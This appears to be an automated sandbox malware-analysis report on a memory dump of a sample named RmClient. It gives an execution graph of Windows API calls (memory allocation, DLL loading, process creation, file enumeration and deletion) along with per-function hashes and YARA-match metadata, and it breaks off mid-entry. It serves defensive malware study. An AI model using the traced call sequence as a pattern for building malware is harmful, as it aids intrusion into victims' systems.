                                                                                                                      execution_graph 78409 52b1d0 78412 54b090 78409->78412 78411 52c841 78415 5491e0 78412->78415 78414 54b0be 78414->78411 78416 549272 78415->78416 78418 54920b 78415->78418 78417 549288 NtAllocateVirtualMemory 78416->78417 78417->78414 78418->78414 78419 530a10 78420 530a2a 78419->78420 78425 5341d0 78420->78425 78422 530a48 78423 530a8d 78422->78423 78424 530a7c PostThreadMessageW 78422->78424 78424->78423 78426 5341f4 78425->78426 78427 5341fb 78426->78427 78428 534230 LdrLoadDll 78426->78428 78427->78422 78428->78427 78429 53f4d0 78430 53f534 78429->78430 78458 535f20 78430->78458 78432 53f66e 78433 53f667 78433->78432 78465 536030 78433->78465 78435 53f813 78436 53f6ea 78436->78435 78437 53f822 78436->78437 78469 53f2b0 78436->78469 78439 549080 NtClose 78437->78439 78440 53f82c 78439->78440 78441 53f726 78441->78437 78442 53f731 78441->78442 78478 54b1f0 78442->78478 78444 53f75a 78445 53f763 78444->78445 78446 53f779 78444->78446 78447 549080 NtClose 78445->78447 78481 53f1a0 CoInitialize 78446->78481 78449 53f76d 78447->78449 78450 53f787 78484 548b40 78450->78484 78452 53f802 78488 549080 78452->78488 78454 53f80c 78491 54b110 78454->78491 78456 53f7a5 78456->78452 78457 548b40 LdrInitializeThunk 78456->78457 78457->78456 78459 535f53 78458->78459 78460 535f74 78459->78460 78494 548be0 78459->78494 78460->78433 78462 535f97 78462->78460 78463 549080 NtClose 78462->78463 78464 536017 78463->78464 78464->78433 78466 536055 78465->78466 78499 5489d0 78466->78499 78470 53f2cc 78469->78470 78471 5341d0 LdrLoadDll 78470->78471 78473 53f2ea 78471->78473 78472 53f2f3 78472->78441 78473->78472 78474 5341d0 LdrLoadDll 78473->78474 78475 53f3be 78474->78475 78476 5341d0 LdrLoadDll 78475->78476 78477 53f418 78475->78477 78476->78477 78477->78441 78504 5493a0 78478->78504 78480 54b20b 78480->78444 78482 53f205 78481->78482 78483 53f29b CoUninitialize 78482->78483 78483->78450 78485 548b5a 78484->78485 78507 3062ba0 LdrInitializeThunk 78485->78507 78486 548b8a 78486->78456 78489 54909d 78488->78489 78490 5490ae NtClose 78489->78490 78490->78454 78508 5493f0 78491->78508 78493 54b129 78493->78435 78495 548bfa 78494->78495 78498 3062ca0 LdrInitializeThunk 78495->78498 78496 548c26 78496->78462 78498->78496 78500 5489ea 78499->78500 78503 3062c60 LdrInitializeThunk 78500->78503 78501 5360c9 78501->78436 78503->78501 78505 5493ba 78504->78505 78506 5493cb RtlAllocateHeap 78505->78506 78506->78480 78507->78486 78509 54940a 78508->78509 78510 54941b RtlFreeHeap 78509->78510 78510->78493 78511 53a9d0 78516 53a6e0 78511->78516 78513 53a9dd 78530 53a360 78513->78530 78515 53a9f9 78517 53a705 78516->78517 78541 537ff0 78517->78541 78520 53a850 78520->78513 78522 53a867 78522->78513 78523 53a85e 78523->78522 78525 53a955 78523->78525 78560 539db0 78523->78560 78527 53a9ba 78525->78527 78569 53a120 78525->78569 78528 54b110 RtlFreeHeap 78527->78528 78529 53a9c1 78528->78529 78529->78513 78531 53a373 78530->78531 78538 53a37e 78530->78538 78532 54b1f0 RtlAllocateHeap 78531->78532 78532->78538 78533 53a39c 78533->78515 78534 537ff0 GetFileAttributesW 78534->78538 78535 53a6b5 78536 53a6cb 78535->78536 78537 54b110 RtlFreeHeap 78535->78537 78536->78515 78537->78536 78538->78533 78538->78534 78538->78535 78539 539db0 RtlFreeHeap 78538->78539 78540 53a120 RtlFreeHeap 78538->78540 78539->78538 78540->78538 78542 538011 78541->78542 78543 538018 GetFileAttributesW 78542->78543 78544 538023 78542->78544 78543->78544 78544->78520 78545 543040 78544->78545 78546 54304e 78545->78546 78547 543055 78545->78547 78546->78523 78548 5341d0 LdrLoadDll 78547->78548 78549 54308a 78548->78549 78550 543099 78549->78550 78573 542b00 LdrLoadDll 78549->78573 78552 54b1f0 RtlAllocateHeap 78550->78552 78556 543244 78550->78556 78553 5430b2 78552->78553 78554 54323a 78553->78554 78553->78556 78557 5430ce 78553->78557 78555 54b110 RtlFreeHeap 78554->78555 78554->78556 78555->78556 78556->78523 78557->78556 78558 54b110 RtlFreeHeap 78557->78558 78559 54322e 78558->78559 78559->78523 78561 539dd6 78560->78561 78574 53d7f0 78561->78574 78563 539e48 78565 539e66 78563->78565 78566 539fd0 78563->78566 78564 539fb5 78564->78523 78565->78564 78579 539c70 78565->78579 78566->78564 78567 539c70 RtlFreeHeap 78566->78567 78567->78566 78570 53a146 78569->78570 78571 53d7f0 RtlFreeHeap 78570->78571 78572 53a1cd 78571->78572 78572->78525 78573->78550 78576 53d814 78574->78576 78575 53d81e 78575->78563 78576->78575 78577 54b110 RtlFreeHeap 78576->78577 78578 53d861 78577->78578 78578->78563 78580 539c8d 78579->78580 78583 53d870 78580->78583 78582 539d93 78582->78565 78584 53d894 78583->78584 78585 53d93e 78584->78585 78586 54b110 RtlFreeHeap 78584->78586 78585->78582 78586->78585 78587 53fdd0 78588 53fdf3 78587->78588 78589 5341d0 LdrLoadDll 78588->78589 78590 53fe17 78589->78590 78591 541410 78592 54142c 78591->78592 78593 541454 78592->78593 78594 541468 78592->78594 78596 549080 NtClose 78593->78596 78595 549080 NtClose 78594->78595 78597 541471 78595->78597 78598 54145d 78596->78598 78601 54b230 RtlAllocateHeap 78597->78601 78600 54147c 78601->78600 78612 53989a 78613 5398a9 78612->78613 78614 5398b0 78613->78614 78615 54b110 RtlFreeHeap 78613->78615 78615->78614 78616 532d83 78621 537a00 78616->78621 78619 532daf 78620 549080 NtClose 78620->78619 78622 537a1a 78621->78622 78626 532d93 78621->78626 78627 548750 78622->78627 78625 549080 NtClose 78625->78626 78626->78619 78626->78620 78628 54876a 78627->78628 78631 30635c0 LdrInitializeThunk 78628->78631 78629 537aea 78629->78625 78631->78629 78632 537041 78633 536fec 78632->78633 78634 537012 78633->78634 78636 53af00 78633->78636 78637 53af26 78636->78637 78638 53b150 78637->78638 78663 549480 78637->78663 78638->78634 78640 53af9c 78640->78638 78666 54c400 78640->78666 78642 53afb8 78642->78638 78643 53b08c 78642->78643 78672 5486b0 78642->78672 78646 5357a0 LdrInitializeThunk 78643->78646 78647 53b0a8 78643->78647 78646->78647 78662 53b138 78647->78662 78683 548220 78647->78683 78648 53b023 78648->78638 78657 53b052 78648->78657 78658 53b074 78648->78658 78676 5357a0 78648->78676 78653 537d80 LdrInitializeThunk 78655 53b146 78653->78655 78655->78634 78656 53b10f 78689 5482d0 78656->78689 78688 544470 LdrInitializeThunk 78657->78688 78679 537d80 78658->78679 78660 53b129 78694 548430 78660->78694 78662->78653 78664 54949d 78663->78664 78665 5494ae CreateProcessInternalW 78664->78665 78665->78640 78667 54c370 78666->78667 78668 54c3cd 78667->78668 78669 54b1f0 RtlAllocateHeap 78667->78669 78668->78642 78670 54c3aa 78669->78670 78671 54b110 RtlFreeHeap 78670->78671 78671->78668 78673 5486cd 78672->78673 78699 3062c0a 78673->78699 78674 53b01a 78674->78643 78674->78648 78678 5357db 78676->78678 78702 548880 78676->78702 78678->78657 78680 537d93 78679->78680 78708 5485b0 78680->78708 78682 537dbe 78682->78634 78684 54829d 78683->78684 78686 54824e 78683->78686 78714 30639b0 LdrInitializeThunk 78684->78714 78685 5482c2 78685->78656 78686->78656 78688->78658 78690 54834a 78689->78690 78692 5482fb 78689->78692 78715 3064340 LdrInitializeThunk 78690->78715 78691 54836f 78691->78660 78692->78660 78695 5484ad 78694->78695 78696 54845e 78694->78696 78716 3062fb0 LdrInitializeThunk 78695->78716 78696->78662 78697 5484d2 78697->78662 78700 3062c11 78699->78700 78701 3062c1f LdrInitializeThunk 78699->78701 78700->78674 78701->78674 78703 54892a 78702->78703 78705 5488ab 78702->78705 78707 3062d10 LdrInitializeThunk 78703->78707 78704 54896f 78704->78678 78705->78678 78707->78704 78709 54862e 78708->78709 78711 5485de 78708->78711 78713 3062dd0 LdrInitializeThunk 78709->78713 78710 548653 78710->78682 78711->78682 78713->78710 78714->78685 78715->78691 78716->78697 78717 529a00 78718 529e27 78717->78718 78720 52a2b1 78718->78720 78721 54ad90 78718->78721 78722 54adb6 78721->78722 78727 524060 78722->78727 78724 54adc2 78726 54adfb 78724->78726 78730 5452f0 78724->78730 78726->78720 78734 532e90 78727->78734 78729 52406d 78729->78724 78732 545352 78730->78732 78731 54535f 78731->78726 78732->78731 78745 531660 78732->78745 78735 532eaa 78734->78735 78737 532ec3 78735->78737 78738 549ad0 78735->78738 78737->78729 78740 549aea 78738->78740 78739 549b19 78739->78737 78740->78739 78741 5486b0 LdrInitializeThunk 78740->78741 78742 549b76 78741->78742 78743 54b110 RtlFreeHeap 78742->78743 78744 549b89 78743->78744 78744->78737 78746 53169b 78745->78746 78761 537b10 78746->78761 78748 5316a3 78749 54b1f0 RtlAllocateHeap 78748->78749 78760 531973 78748->78760 78750 5316b9 78749->78750 78751 54b1f0 RtlAllocateHeap 78750->78751 78752 5316ca 78751->78752 78753 54b1f0 RtlAllocateHeap 78752->78753 78754 5316db 78753->78754 78755 531769 78754->78755 78776 536680 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 78754->78776 78757 5341d0 LdrLoadDll 78755->78757 78758 531922 78757->78758 78772 547c30 78758->78772 78760->78731 78762 537b3c 78761->78762 78763 537a00 2 API calls 78762->78763 78764 537b5f 78763->78764 78765 537b81 78764->78765 78766 537b69 78764->78766 78768 537b9d 78765->78768 78770 549080 NtClose 78765->78770 78767 537b74 78766->78767 78769 549080 NtClose 78766->78769 78767->78748 78768->78748 78769->78767 78771 537b93 78770->78771 78771->78748 78773 547c92 78772->78773 78775 547c9f 78773->78775 78777 531990 78773->78777 78775->78760 78776->78755 78793 537de0 78777->78793 78779 5319b0 78786 531f06 78779->78786 78797 540de0 78779->78797 78782 531bc1 78784 54c400 2 API calls 78782->78784 78783 531a0e 78783->78786 78800 54c2d0 78783->78800 78787 531bd6 78784->78787 78785 537d80 LdrInitializeThunk 78789 531c26 78785->78789 78786->78775 78787->78789 78805 5304a0 78787->78805 78789->78785 78789->78786 78791 5304a0 LdrInitializeThunk 78789->78791 78790 537d80 LdrInitializeThunk 78792 531d74 78790->78792 78791->78789 78792->78789 78792->78790 78794 537ded 78793->78794 78795 537e15 78794->78795 78796 537e0e SetErrorMode 78794->78796 78795->78779 78796->78795 78798 54b090 NtAllocateVirtualMemory 78797->78798 78799 540e01 78798->78799 78799->78783 78801 54c2e6 78800->78801 78802 54c2e0 78800->78802 78803 54b1f0 RtlAllocateHeap 78801->78803 78802->78782 78804 54c30c 78803->78804 78804->78782 78806 5304ae 78805->78806 78809 549300 78806->78809 78810 54931a 78809->78810 78813 3062c70 LdrInitializeThunk 78810->78813 78811 5304bf 78811->78792 78813->78811 78814 53c280 78816 53c2a9 78814->78816 78815 53c3ad 78816->78815 78817 53c353 FindFirstFileW 78816->78817 78817->78815 78820 53c36e 78817->78820 78818 53c394 FindNextFileW 78819 53c3a6 FindClose 78818->78819 78818->78820 78819->78815 78820->78818 78821 536dc0 78822 536ddc 78821->78822 78826 536e2f 78821->78826 78824 549080 NtClose 78822->78824 78822->78826 78823 536f64 78825 536df7 78824->78825 78831 5361b0 NtClose LdrInitializeThunk LdrInitializeThunk 78825->78831 78826->78823 78832 5361b0 NtClose LdrInitializeThunk LdrInitializeThunk 78826->78832 78828 536f3e 78828->78823 78833 536380 NtClose LdrInitializeThunk LdrInitializeThunk 78828->78833 78831->78826 78832->78828 78833->78823 78839 548d80 78840 548e34 78839->78840 78842 548daf 78839->78842 78841 548e4a NtCreateFile 78840->78841 78843 3062ad0 LdrInitializeThunk 78844 5369f0 78845 536a17 78844->78845 78848 537bb0 78845->78848 78847 536a3b 78849 537bcd 78848->78849 78855 5487a0 78849->78855 78851 537c1d 78852 537c24 78851->78852 78853 548880 LdrInitializeThunk 78851->78853 78852->78847 78854 537c4d 78853->78854 78854->78847 78856 548838 78855->78856 78857 5487cb 78855->78857 78860 3062f30 LdrInitializeThunk 78856->78860 78857->78851 78858 548871 78858->78851 78860->78858 78861 548ef0 78862 548f97 78861->78862 78864 548f1e 78861->78864 78863 548fad NtReadFile 78862->78863 78865 54c330 78866 54b110 RtlFreeHeap 78865->78866 78867 54c345 78866->78867 78870 5323f8 78871 532418 78870->78871 78872 535f20 2 API calls 78871->78872 78873 532423 78872->78873 78874 5299a0 78875 5299af 78874->78875 78876 5299f0 78875->78876 78877 5299dd CreateThread 78875->78877 78878 535820 78879 537d80 LdrInitializeThunk 78878->78879 78880 535850 78879->78880 78882 53587c 78880->78882 78883 537d00 78880->78883 78884 537d44 78883->78884 78889 537d65 78884->78889 78890 548380 78884->78890 78886 537d71 78886->78880 78887 537d55 78887->78886 78888 549080 NtClose 78887->78888 78888->78889 78889->78880 78891 5483fa 78890->78891 78893 5483ab 78890->78893 78895 3064650 LdrInitializeThunk 78891->78895 78892 54841f 78892->78887 78893->78887 78895->78892 78896 548660 78897 54867a 78896->78897 78900 3062df0 LdrInitializeThunk 78897->78900 78898 5486a2 78900->78898 78901 547420 78903 547485 78901->78903 78902 5474bc 78903->78902 78906 53b170 78903->78906 78905 54749e 78907 53b190 78906->78907 78908 53b11b 78906->78908 78909 5482d0 LdrInitializeThunk 78908->78909 78910 53b129 78909->78910 78911 548430 LdrInitializeThunk 78910->78911 78912 53b138 78911->78912 78913 537d80 LdrInitializeThunk 78912->78913 78914 53b146 78913->78914 78914->78905 78915 5484e0 78916 54850e 78915->78916 78917 54856f 78915->78917 78920 3062ee0 LdrInitializeThunk 78917->78920 78918 5485a0 78920->78918 78921 545d60 78922 545dba 78921->78922 78924 545dc7 78922->78924 78925 543760 78922->78925 78926 54b090 NtAllocateVirtualMemory 78925->78926 78927 5437a1 78926->78927 78928 5341d0 LdrLoadDll 78927->78928 78931 5438ae 78927->78931 78930 5437e7 78928->78930 78929 543830 Sleep 78929->78930 78930->78929 78930->78931 78931->78924 78932 548fe0 78933 549057 78932->78933 78935 54900e 78932->78935 78934 54906d NtDeleteFile 78933->78934 78936 5417a0 78937 5417b9 78936->78937 78938 541801 78937->78938 78941 541841 78937->78941 78943 541846 78937->78943 78939 54b110 RtlFreeHeap 78938->78939 78940 54180e 78939->78940 78942 54b110 RtlFreeHeap 78941->78942 78942->78943 78945 5384a4 78946 5384b4 78945->78946 78948 538461 78946->78948 78949 536c00 LdrInitializeThunk LdrInitializeThunk 78946->78949 78949->78948 78950 531fad 78951 531f43 78950->78951 78952 531fb0 78950->78952 78953 531f56 78951->78953 78954 5486b0 LdrInitializeThunk 78951->78954 78952->78952 78957 549110 78953->78957 78954->78953 78956 531f6b 78958 54919f 78957->78958 78960 54913e 78957->78960 78962 3062e80 LdrInitializeThunk 78958->78962 78959 5491d0 78959->78956 78960->78956 78962->78959

                                                                                                                      Executed Functions

                                                                                                                      Function 00529A00 Relevance: 33.0, Strings: 26, Instructions: 453COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 28 529a00-529e25 29 529e36-529e40 28->29 30 529e42-529e4e 29->30 31 529e50-529e59 29->31 30->29 32 529e5b-529e7c 31->32 33 529e7e-529e88 31->33 32->31 35 529e99-529ea2 33->35 36 529ea4-529eb6 35->36 37 529eb8-529ec2 35->37 36->35 38 529ed3-529edd 37->38 40 529f31-529f42 38->40 41 529edf-529f2f 38->41 42 529f53-529f5c 40->42 41->38 44 529f5e-529f6b 42->44 45 529f6d-529f7e 42->45 44->42 46 529f8f-529f98 45->46 48 529f9a-529fad 46->48 49 529faf-529fc0 46->49 48->46 50 529fd1-529fdd 49->50 52 529fea-529ff3 50->52 53 529fdf-529fe8 50->53 54 529ff9-52a000 52->54 55 52a23f-52a249 52->55 53->50 58 52a00b-52a012 54->58 57 52a25a-52a263 55->57 59 52a265-52a278 57->59 60 52a27a-52a281 57->60 61 52a051-52a058 58->61 62 52a014-52a04f 58->62 59->57 63 52a287-52a290 60->63 64 52a32f-52a336 60->64 67 52a05a-52a070 61->67 68 52a07d-52a087 61->68 62->58 70 52a292-52a2aa 63->70 71 52a2ac call 54ad90 63->71 72 52a377-52a37e 64->72 73 52a338-52a375 64->73 74 52a072-52a078 67->74 75 52a07b 67->75 69 52a098-52a0a4 68->69 76 52a0a6-52a0b8 69->76 77 52a0ba-52a0cd 69->77 70->63 83 52a2b1-52a2bb 71->83 79 52a380-52a38c 72->79 80 52a3bc-52a3c5 72->80 73->64 74->75 75->61 76->69 82 52a0de-52a0ea 77->82 84 52a393-52a395 79->84 85 52a38e-52a392 79->85 86 52a100-52a10a 82->86 87 52a0ec-52a0fe 82->87 90 52a2cc-52a2d8 83->90 88 52a3a6-52a3ba 84->88 89 52a397-52a3a0 84->89 85->84 92 52a11b-52a127 86->92 87->82 88->72 89->88 93 52a2f6-52a300 90->93 94 52a2da-52a2e6 90->94 96 52a137-52a141 92->96 97 52a129-52a135 92->97 95 52a311-52a31d 93->95 98 52a2f4 94->98 99 52a2e8-52a2ee 94->99 95->64 100 52a31f-52a325 95->100 102 52a152-52a15b 96->102 97->92 98->90 99->98 104 52a327-52a32a 100->104 105 52a32d 100->105 106 52a171-52a17b 102->106 107 52a15d-52a16f 102->107 104->105 105->95 108 52a18c-52a198 106->108 107->102 111 52a1b0-52a1bf 108->111 112 52a19a-52a1a3 108->112 115 52a1c1-52a1cb 111->115 116 52a205-52a211 111->116 113 52a1a5-52a1ab 112->113 114 52a1ae 112->114 113->114 114->108 118 52a1dc-52a1e5 115->118 119 52a213-52a22e 116->119 120 52a230-52a23a 116->120 121 52a203 118->121 122 52a1e7-52a1f3 118->122 119->116 120->52 121->55 123 52a201 122->123 124 52a1f5-52a1fb 122->124 123->118 124->123
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_520000_RmClient.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $"|$%s$)$*$+o$0T$4<$6$=$E$M$PH$R$W.$XV$b_$c/$j$k$oC$u$y$}$B$}
                                                                                                                      • API String ID: 0-2301151960
                                                                                                                      • Opcode ID: f2bce0f3554e2d894f9bf6843d7e4600a6ea4a7866b9fe11626fd644518aeb3b
                                                                                                                      • Instruction ID: 90d481c3c8dfc79d0bf558ae04dacf189acc2a1a15a567be73c1c49c31decbf4
                                                                                                                      • Opcode Fuzzy Hash: f2bce0f3554e2d894f9bf6843d7e4600a6ea4a7866b9fe11626fd644518aeb3b
                                                                                                                      • Instruction Fuzzy Hash: 634279B0905269CBEB64CF44D998BDDBBB2BF45308F2086D9C40D6B281CBB55AC9CF45
                                                                                                                      Function 0053C280 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 0053C364
                                                                                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 0053C39F
                                                                                                                      • FindClose.KERNELBASE(?), ref: 0053C3AA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_520000_RmClient.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3541575487-0
                                                                                                                      • Opcode ID: 5c2b0dcf3e29572057246500a1894db414adfab38c359f58219b6f5fecd4d6ea
                                                                                                                      • Instruction ID: 3176be929c9fdf627b5b3e192a8ad910cf6e07b280d82e4d358be70303b05cdf
                                                                                                                      • Opcode Fuzzy Hash: 5c2b0dcf3e29572057246500a1894db414adfab38c359f58219b6f5fecd4d6ea
                                                                                                                      • Instruction Fuzzy Hash: 69317275900709BBDB20DB64CC89FFF7B7CAF85744F144458B908A7181EA70AA84CBA4
                                                                                                                      Function 00548D80 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • NtCreateFile.NTDLL(7555528C,?,?,?,?,?,?,?,?,?,?), ref: 00548E7B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_520000_RmClient.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 823142352-0
                                                                                                                      • Opcode ID: 9b61a9231aa61c4d26af5e12ff28be539a9e08509a6be0c3b0ba6cbb6713469e
                                                                                                                      • Instruction ID: fc6202a3ad7c03b4dd9306c71fc92370f969f15483e149414d2cb3c02e5f6248
                                                                                                                      • Opcode Fuzzy Hash: 9b61a9231aa61c4d26af5e12ff28be539a9e08509a6be0c3b0ba6cbb6713469e
                                                                                                                      • Instruction Fuzzy Hash: 7E31E6B5A01609AFDB14DF98D885EEFBBB9AF8C314F108119F918A3340D730A951CBA5
                                                                                                                      Function 00548EF0 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • NtReadFile.NTDLL(7555528C,?,?,?,?,?,?,?,?), ref: 00548FD6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_520000_RmClient.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FileRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2738559852-0
                                                                                                                      • Opcode ID: d6fc3388c491b47a07547dac03d3507cf603be5bfe5fad50a33c618003d1c053
                                                                                                                      • Instruction ID: c4043b6b8d683020b66bcc9d5dc5679f97cb4ff66c222bd8fe75e347e3ce9dd1
                                                                                                                      • Opcode Fuzzy Hash: d6fc3388c491b47a07547dac03d3507cf603be5bfe5fad50a33c618003d1c053
                                                                                                                      • Instruction Fuzzy Hash: 243107B5A00609AFDB04DF98D885EEFBBF9AF8C314F008109F918A7341D770A910CBA5
                                                                                                                      Function 005491E0 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • NtAllocateVirtualMemory.NTDLL(7555528C,?,00547C9F,00000000,00000004,00003000,?,?,?,?,?,00547C9F,00531A0E,00547C9F,00000000), ref: 005492A5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_520000_RmClient.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2167126740-0
                                                                                                                      • Opcode ID: 017068d2e2586fda7af7b5b9bcd7d51c8a5596ad40ae70a7fd60c83975473353
                                                                                                                      • Instruction ID: af901c6c22b72c0e124da3d73bed2bfe33ec313c9b2e8ef5839de4f3b5377f9d
                                                                                                                      • Opcode Fuzzy Hash: 017068d2e2586fda7af7b5b9bcd7d51c8a5596ad40ae70a7fd60c83975473353
                                                                                                                      • Instruction Fuzzy Hash: A4213CB5A00609AFDB10DF98D885EEF7BB9EF88714F108109FD18A7241D770A910CBA5
                                                                                                                      Function 00549080 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 005490B7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_520000_RmClient.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Close
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3535843008-0
                                                                                                                      • Opcode ID: 25d4ae8e20885b246a0b33a202f6818839664ef0674a9c243f9a03256c03aea3
                                                                                                                      • Instruction ID: 581fb89445f9db6d4ef24e0ca2dc281ef5cdeba87e830d1edc3c955d8915c88c
                                                                                                                      • Opcode Fuzzy Hash: 25d4ae8e20885b246a0b33a202f6818839664ef0674a9c243f9a03256c03aea3
                                                                                                                      • Instruction Fuzzy Hash: AFE086352446157BD520FA59DC05FD7775CDFC5754F404015FA0CA7142CA71790187F5
                                                                                                                      Function 0053098B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 94threadwindowCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 519 53098b-5309af 521 5309b1-5309c7 519->521 522 5309f4-530a04 519->522 523 530a0d-530a7a call 54b1b0 call 54bbc0 call 5341d0 call 521410 call 5418c0 521->523 522->523 534 530a9a-530aa0 523->534 535 530a7c-530a8b PostThreadMessageW 523->535 535->534 536 530a8d-530a97 535->536 536->534
                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(661035W,00000111,00000000,00000000), ref: 00530A87
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_520000_RmClient.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID: 661035W$661035W
                                                                                                                      • API String ID: 1836367815-4108853117
                                                                                                                      • Opcode ID: 8b33e8794dd317a9e6fc126776e8feb1a58c8a1635324930f27a7fe06ac6a747
                                                                                                                      • Instruction ID: 5ba73c696cd3d627cd95fd4a0b92784b487f824b45fa71fab02b517e822f79aa
                                                                                                                      • Opcode Fuzzy Hash: 8b33e8794dd317a9e6fc126776e8feb1a58c8a1635324930f27a7fe06ac6a747
                                                                                                                      • Instruction Fuzzy Hash: 4C216B72D0429D7FEF119BB49C95AEFBFBCEF82364F044198F94867182D2614D0587A1
                                                                                                                      Function 00530957 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 77threadwindowCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 537 530957-530967 538 530969 537->538 539 5309bc-530a7a call 54b1b0 call 54bbc0 call 5341d0 call 521410 call 5418c0 537->539 538->539 551 530a9a-530aa0 539->551 552 530a7c-530a8b PostThreadMessageW 539->552 552->551 553 530a8d-530a97 552->553 553->551
                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(661035W,00000111,00000000,00000000), ref: 00530A87
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_520000_RmClient.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID: 661035W$661035W
                                                                                                                      • API String ID: 1836367815-4108853117
                                                                                                                      • Opcode ID: 5a3e00590b4390e2241640e478fe02140869a724d49190a5a6f659aca5588c86
                                                                                                                      • Instruction ID: 42709c61520c9e38b1cbcca0855886444eb6b4464e519117d4041b83656da88c
                                                                                                                      • Opcode Fuzzy Hash: 5a3e00590b4390e2241640e478fe02140869a724d49190a5a6f659aca5588c86
                                                                                                                      • Instruction Fuzzy Hash: 0711E17290024DBAEB11EAA49C92DEFBFBCEF913A4F108564F904A7141D2748D068BA1
                                                                                                                      Function 00530A06 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61threadwindowCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 554 530a06-530a22 555 530a2a-530a7a call 54bbc0 call 5341d0 call 521410 call 5418c0 554->555 556 530a25 call 54b1b0 554->556 565 530a9a-530aa0 555->565 566 530a7c-530a8b PostThreadMessageW 555->566 556->555 566->565 567 530a8d-530a97 566->567 567->565
                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(661035W,00000111,00000000,00000000), ref: 00530A87
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_520000_RmClient.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
